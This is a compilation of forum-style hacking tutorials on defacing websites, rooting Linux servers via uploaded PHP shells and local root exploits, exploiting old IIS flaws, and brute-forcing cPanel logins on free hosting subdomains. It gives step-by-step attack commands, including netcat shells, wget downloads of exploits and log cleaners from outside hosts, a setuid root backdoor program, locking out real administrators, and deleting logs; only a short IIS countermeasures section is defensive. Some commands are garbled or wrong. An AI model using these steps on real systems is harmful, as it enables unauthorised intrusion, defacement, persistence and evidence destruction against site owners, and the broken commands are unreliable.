How to deface a "r00ted" server

**********STEP 1**********

First what you want to do is get a idea of what you want the deface tosay and what languageyour most likely going to use.
*** common languages for deface are***

1.HTML

2.CSS

3.XML

4.php(not to sure about this one)

5.CS5 using adobe(if you wanna get fancy)

the choices may very....
but for this TuT' am were going to use HTML because its more common.
what ever language you happen to choose (i recommend HTML) you want to make sure you brush up on it and are very familiar with it so to be able to make a decent looking file to host on the "rooted" server.

           **********STEP 2**********

the next thing you want to do is look at the server database of the location were you are going to be hosting the .html deface file and to see what the server will take and will not take from .html files.THIS IS VERY IMPORTANT you must check with the server and test out the filesbefore you try to host or make your deface html file (some server i comeacross with only host XML or CSS) you want to make sure you know what type of language it will host and what the will not host.
alot of the times servers can be very expandable so it will take mostly anything you throw at it but just to be sure please check.

**********STEP 3**********

well ones you have done all your checking and you looked at the server and you have a basic idea of what you'll be doing we can start building the your deface file.

***Tool's you will need***

1.notepad++(i recommend this version of notepad)link Click Here
2. a guide to all the html or the language you'll be using
unless your TOTAL NINJA:ninja: at the language then you
skip this tool
3.(this one you'll need it will cut the work in almost half)
phpMyAdmin- this tool will let you test your .html ect. and it won't take you a sec. to download here's the link http://www.phpmyadmin.net/home_page/index.php-OK one's you have all the tools listed here (guide is optional) you can start building the .html file using the tools i just listed it should be a snap if done right.
-OK listen up here!! at this point you might think am also going to show you how to write html too huh? wellsorry to say it but showing you
how to right html and explaining how to do this would take WAY!! to long and if your here on adefacing TuT' and you don't know how to write html then you should really bein a html TuT'.my html TuT coming soon!!!
-OK so ones you have your html file is made you can save it as a .html file. you can name it what ever you want doesn't matter it won't affect
the proses at all and the one's you tested it out on phpMyAdmin and your are happy with the results thenyou can start the defacing!:hehe:

**********STEP 4**********

-OK the next step you want to take is opening your "rooted" server
BUT you always want to be sure VERY sure you have a good! proxy server running and you always havemulti s0cks for your http browser wen you are entering a "r00ted" server and never EVER EVER!!! set theserver config setting to your own settings(most servers have auto config for admin account)this logs the last login from the admin and ads the ip and port number it came from and if to don't have a pr0xy and good s0cks then you must be VERY careful of the IP and port you use and NEVER! set the config up yourself you'll screw-up the ip settings on the server.:nono:

**********STEP 5**********

-OK one's you are in the admin accounts and the server settings youwant to look for an .html or ect. and you want to copy all of the code you see.Then you want to open your regular notepad and paste all the code inside the notepad doc. after the code is all in there you want to save the doc. as a .html file name it whatever.Then you want to open it and see if the file looks like the site server you "r00ted" if so the you want to go back to the server then you want to erase all of the code that you copied, after you have done that you want to refresh the server setting and type in the URL of the site that you "r00ted". If nothingshows up but the page is done loading then that means you have just taken the html visuals out and the site is faceless!!!

**********STEP 6**********

-OK ones the site is faceless you want to so back to the server settingand you want to add your file and make sure that the server is runningthe defacing file.So about this point you think your done huh? well wrong your not, you need to make apath for the file to and for the user to be redirected to if this step is not done all the user will see is the blank page, another reason why you need a path is because if the admin of the server ever gets back the admin account it will be harder for them to find the file from were the defacing is coming from thus making it harder for them to take it down. :hehe:

**********STEP 7**********

-OK in order to make a good path forthe file you must find a empty path name on the server that is not beingused by another file hosted by the server. Wen i look for one i try to find the dorks for them on Google.com
but you want just guest most of the time and land on a empty one all the time most small sites have all the common one and not the Ftp paths and the .asp paths but its all up to you!
ones you have your file hosted and your paths is found all you have to do is replace the URL of the site and the redirect URL of the site to both of your html file and your path.
EXAMPLE: http://www.example.com/(your file path here).html
then you want to replace the regular URL with your are try it out!!!!.:yeye:
if all came out well and the deface page looks good then your mission is completed!!!.:thumbsup:
you have just defaced a website!!.
if google doesnt pick up on it then give it a day or two then try again am sure! it will work!! then the final step i to brag to all your friends about your hacked! site. :tongue:
thank you for reading...

Full Rooting Explanation

Rooting is gaining a high uid on a server which gains statics to control the entire server.
Most people think they are actually completing their step in rooting when they are not,
all people do is mixed in this order:

1. Back Connect OR use the prompt in the shell itself and type in uname -a

2. Get the version for the box, it may be familiar to 2.6.18

3. Go on securityfocus or 1337day.com and search for it.

4. Get a connection via back-connect, then they simply wget a Local Root Exploit.

Or simply go to the PHP shell itself and go to a dir and upload a .C file which pertains a Local Root Exploit.

5- Get the ID it was labeled, it will be featured in the wget results,
or if you did it via shell, you will know the name it was given because you uploaded it.

6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing.
You will use 1337day and while your doing this you will upgrade your knowledge.

First, get your PHP shell, you can upload it through FTP using mput
(mput is a command used to add something on a server included from your system, example: mput C:usersX-pOSedshell.php)
Or you can do it if you find an upload.php dir on the system,
of course upload.php can feature uploading php,
or it can feature an only accessory for .jpg/.png/etc. Well,
this can easily be bypassed through a Null Byte Upload, to do this,
all you need to do is compile your php script into a .jpg function.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (you have to leave it is a URL-Encoded Byte)

4. Upload on the server.

Null Byte is used to terminate anything after it.

But this can be patched on some web servers, so DO NOT expect it to work 100%.

But if /upload.php features an accessible function for the extension .php
Then upload your normal PHP Shell. And then you need to find the directory,
you can usually get this by doing the following:

1. Your victimized site has to have Anonymous User enabled.

2. Open Command Prompt

3. Type in ftp http://www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished type in: quote user ftp (It quotes the user under the name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type in: quote pass ftp

Now you have the ability to view dirs, cd to directories, etc.

Try finding incoming, and if you do, try finding your shell.

If you cannot find anything, there are other things you can do.

You can use acunetix web scanner to find directories.

After you got your shell up and ready, play around a bit,
and try finding mysql details (in config.php, irc details in ircd.conf, etc, etc) If you find it there is probably an mysql option in your shell, use it.
You can also try logging in with those details in SSH, which can get you root easily. To try this out, you cannot just telnet to port 22, because port 22 (ssh) has its own client/server.

Download PuTTy Click Here

Insert the site you want to connect to, and be sure the label is selected on SSH.

Once you do that, press Open.

Now try the details you got in config.php

If it doesn’t work, your out of luck on that probability.

But, we do not stop there.

Go to “Back Connection” your IP is in the text box and in the sec text box is your port,
the port you want to back-connect to needs to be forwarded. This can be easily done if you locate your HTTP config for your router.
You can find this in command prompt by typing in ipconfig and in linux all you need to do is type in ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password,
if its changed, just simply restart your router, and if it still does not work, search on google.

After your port is forwarded (Port forward example: 1337) insert it into the second text box. But wait up, your not done. You will need to install netcat,
in linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

Click Here

You might need to uninstall winrar, well, put nc111nt.zip in a directory, on your desktop, documents, anywhere. I recommend putting it on the desktop time-being.

Then open Command Prompt, then type in cd C:usersNAMEdesktopnc111nt or cd C:usersNAMEdesktopnc111nt.zip

Now when your in there, type:

nc

If anything comes back, its working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press enter, then go to your shell and press the magic button ( On the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This will show us its current Linux Version, SMTP Version, PHP version, etc, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now you go to 1337day.com, as you can see .

There are various more all you need to do is go 1337day and search for 2.6.17

That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.C

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier uploaded via our shell, which in this case is LocalRootExploit.c)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID, it comes with something like: uid=(0)root you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case: milw0rm)

4. Now considering 5092 was the last bit in our URL, that is what we will need to compile it as

5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier wget’d, which in this case is 5092)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID,
it comes with something like: uid=(0)root you’ve completed your mission as well.

Now you can add an sshdoor via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install some accessories you can also use the Edit command or Emacs command to add a password logger (php based) on login.php.

Learn How To Hack Web Servers

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
 www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,

which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,

any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
 but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

CPanel Cracking

Today I want to show you my news Cpanel cracking Tutorial, I found this way by myself (I mean the dork, not everything)

What you need:
-Cpanel brute forcing programm (I recomend Acunetix or the Cpanel perl script)
-A brain (I recomndet a good one, you'll need it for username)
-Browser
-And maybe FTP-Client (Decide what you want)
-Wordlist for passwords

What I used:
-Cpanel brute forcing programm: Acunetix
-Brain: The best
-Browser: Firefox
-Ftp-client: The default windows ftp-client
-Wordlist for passwords: I use a 26GB passlist

Dork for finding hackable sites:
site:heliohost.org
or
site:afreehosterwithcpanelsupport.com/.in/.net/...

I used http://indianew.heliohost.org

Usename:
Mostly subdomain (In my case indianew)

Port:
Mostly 2082
or
/cpanel

Password:
We'll brute force that
But you need a passlist for that

In my Video I`ll use a shorten passlist, cause I already know the password.
------------------------

Video:
http://www.multiupload.com/NORUKXMZ89

------------------------

Ok start with Tutorial:

1. Find hackable site and open the cpanel login (e.g. http://example.example.org:2082)

2. When you open the site, a Pop-up has to open, if not search for another site

3. Open Acunetix, navigate to "Authentication Tester"

4. At target URL to test: http://example.example.org:2082

5. Now create a new txt file anywhere with the username in it (You can brute force that too, but you won't find something)

6. Choose in acunetix "USername dictionary path" the file you made at step 5

7. For "Password dictionary path" use the Acunetix default list, or your own passlist

8. Now click on start

9. This may take a while

10. If you find something GREAt if not search for antoher site ot use another username or use another passlist

11. If you find something go to the cpanel site in your browser (e.g. http://example.example.org:2082 or http://example.org/cpanel)

12. Login with the username and password you found at stap 10

13. BAAAAAAAM You'r in, now you can do anything what you want with the site But I explain now some steps you should do

14. Change Password of cpanel ond also of ftp so that the target admin isn't able to login anymore and delete your deface. (After changing the password, you maybe have to re-login with new password)

15. Upload your Defacemant at the "File-Manager" or use FTP for that I'll use FTP, cause I love it , if you want to use FTP continue reading, if ya want to upload the file with file manager continue by yourself

16. Open "FTP-Accounts"

17. Change the password of every FTP-Account!!!

18. Scroll down to Special FTP-Accounts and click an "Configure FTP-Client" of /home/username goes here

19. You'll get the information of ftp username and ftp-server and port and SFTP port

20. Password is the same, which you set at 14

21. Now open a FTP-client and login with this informations, I'll use the windows default, if you want to use that too continue reading, if you use an own ftp-client use your own

22. Open CMD

23. Tip "ftp"

24. Then "open here server, which you found at step 19"

25. Then you have to tipp username, which you found at step 19

26. The password, which you set at step 14

27. Tip "cd /public_html" or whereever the index site is

28. Tip "del index.html" or what file ya want to delete (e.g. index.php, index.html,...)

27. Tip "send C:\where your deface page is" in my case "send C:\index.html"

28. The site is defaced

29. Now you should delete the log files!!!REALLY IMPORTANT!!! (I forget that in the video)

30. For that go back to cpanel Ftp Accounts and there sould be username_logs in my case indianew_logs

31. navigate to configure FTP-Client

32. Login witht that informations

33. Delete all LOGS now disconnect from server and you'r finished

---------------------------

I hope you understood a video tut also coming 

How to Root

Required for this tutorial:

Code:
Access to a shell - Upload by any-means a shell onto a box mig-log cleaner - http://b14ck1c3.freehostia.com/miglc Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip Netcat(unix) - http://b14ck1c3.freehostia.com/nc Local RootExploit - http://jshooter.by.ru/xpl/
half a brain
willingness to learn

Now that you have all that in order lets begin.

Go to the path of or access your shell by whatever means nessecary.
Make sure that your shell is in a writable folder just to make things
easy for us. In our case today for this tutorial we will be using
storm7shell not exactly my favorite but will get the job done none the less.
An example of this location would be something like:

Code:
http://target/youshell.php
Now that we are on your shells page we want to find out what os this box is
running and what version the kernel is. In our case it’s linux 2.6.8. So we
will want to find a local root exploit for this kernel version of the linux os.
What we want to do now that we have our local root exploit for our kernel
is spawn a shell so that we can talk to the victim’s box and run our commands
without interuption, But how are we suppose to do that? This can be done by
using a tool called Netcat. So now that we have a copy of Netcat we will go to
the shell, Find the command execution area of the shell and enter:

Code:
wget http://b14ck1c3.freehostia.com/nc
What this will do is download the file of Netcat i have pre-compiled and hosted
for you onto the victim box to the location of your shell. Once we have the download
complete we will want to chmod it so that our user has access to run it. which can
be done by entering:

Code:
chmod +x nc
What this does is grants everyone (user, group and other) execute permission, and the
command to the file nc which we had just previously downloaded onto the box with the
wget command.

Now that we have nc installed on both the victim machine and your own it’s time to make
our connection. How Do we make a connection with nc? In the command execution area of your
shell enter:

Code:
./nc -l -p 8080 -e /bin/sh
(shell can be /bin/sh or cmd.exe for example)

And then on the netcat installed on your pc you will want to enter:
nc VictimIP Port *in our case 8080*

Code:
eg 123.123.123.123 8080
What this will do is cause the netcat on the victims box to listen on port 8080 and shovel
back an interactive shell for you once you make the connection from which you typed:

Code:
nc victimip port
Now that We have our interactive shell spawned we can start to prepare the box for rooting.
First we will want to get our local root exploit onto the box and get it compiled if it’s
not already. This can be done by once again using that nifty wget command we learned about
in the previous steps.

Code:
wget http://yoursite/xpl
What we have done is now downloaded your exploit. If your exploit is not already compiled you
will need to compile it in order to run it. Compiling your exploit can be done by using the gcc,
like so:

Code:
gcc xpl.c -o xpl;chmod +x xpl
This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy
of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on.
The exploit will vary on their usage so make sure you have an understanding of the root exploit
you are using. You can run your xpl file by entering in:

Code:
./xpl
Wait until your exploit is finished running once it is done enter:

Code:
whoami
What the whoami command does is tells you who you are if this tells you root then you xpl has done
it’s job and you now have root priv’s on the box. or you can type:

Code:
id
which will give you something like:

Code:
uid=0(root) gid=0(root) groups=500(apache) or something similar
And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make
sure that we can come and go as we please without all the hassel of rooting the box over and over. So
we will want to create some kind of backdoor.
we can make this happen with few lines of code:

Code:
#include  #include  #include  #include   int main( void ) {      setuid( 0 );      system( "/bin/bash" );       return 0; }
Compile it and change permissions:

Code:
root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdr
Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably
in the $PATH) and if you execute it as another user:
raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami

root

Now you have your access back.

Alright we are almost completed our mission we have successfully rooted our victims box created our
backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This
can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you
can get here:

Code:
http://b14ck1c3.freehostia.com/miglc
Once again we can use our wget command to upload our logcleaner to the rooted box.

Code:
wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc
now just run the logcleaner

Code:
./miglc
The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you.